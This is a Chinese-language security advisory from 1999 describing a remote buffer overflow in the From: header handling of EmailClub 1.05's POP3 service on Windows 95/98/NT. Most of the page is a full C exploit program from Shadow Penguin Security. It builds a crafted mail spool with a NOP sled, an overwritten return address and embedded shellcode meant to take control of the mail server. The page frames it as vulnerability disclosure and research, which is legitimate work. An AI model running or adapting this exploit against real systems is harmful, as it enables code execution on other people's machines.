E-MailClub 缓存溢出漏洞
发布日期:1999-11-15
更新日期:1999-11-15
受影响系统:Admiral Systems Inc. EmailClub 1.05
- Microsoft Windows 98.0j
- Microsoft Windows 95.0j
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0
描述:
EmailClub是Admiral Systems Inc.出品的一个邮件服务包,最近被发现存在一个远程溢出漏洞。
溢出产生的原因是EmailClub's POP3服务对接收邮件的‘Form:’头文件没有进行恰当的边界检查。
这个溢出可以危及Windows 95/98系统的安全,同样也可以影响Windows NT系统。
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/*==================================================
E-MailClub Ver1.0.0.5 for Windows98J exploit
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin@backsection.net)
====================================================
*/
#include
#include
#define HD1 \
"From exploit Wed Oct 27 01:53 JST 1999\n"\
"Date: Wed, 27 Oct 1999 01:53:00 +0900\n"
#define HD2 \
"Message-Id: <3815C9EBDC.E749HOGE@192.168.0.1>\n"\
"MIME-Version: 1.0\n"\
"Content-Transfer-Encoding: 7bit\n"\
"Content-Type: text/plain; charset=US-ASCII\n"\
"Content-Length: 1\n"\
"Status: U\n\n\n\n"
#define MAXBUF 2000
#define MAXBUF2 500
#define NOP 0x90
#define RETADR 511
#define EIP 0x7fc1415b
unsigned char exploit_code[100]={
0xb8,0x55,0x55,0x55,
0x55,0x50,0x50,0xB8,
0x96,0x91,0xFA,0x5F,
0x03,0xC0,0x50,0xc3,
};
main(int argc, char *argv[])
{
FILE *fp;
char buf[MAXBUF];
unsigned int ip;
if (argc!=2){
printf("usage: %s mailspool\n",argv[0]);
exit(1);
}
if ((fp=fopen(argv[1],"wb"))==NULL){
printf("Can not write to %s\n",argv[1]);
exit(1);
}
memset(buf,NOP,MAXBUF);
buf[MAXBUF-1]=0;
ip=EIP;
buf[RETADR-1]=0xa0;
buf[RETADR ]=ip&0xff;
buf[RETADR+1]=(ip>>8)&0xff;
buf[RETADR+2]=(ip>>16)&0xff;
buf[RETADR+3]=(ip>>24)&0xff;
strncpy(buf+RETADR+40,exploit_code,strlen(exploit_code));
fprintf(fp,"%s",HD1);
fprintf(fp,"From: %s \n",buf);
fprintf(fp,"To: you@your.host.net\n");
fprintf(fp,"Subject: subscribe exploit\n");
fprintf(fp,"%s",HD2);
fclose(fp);
}
建议:
暂无
浏览次数:9788
严重程度:0(网友投票)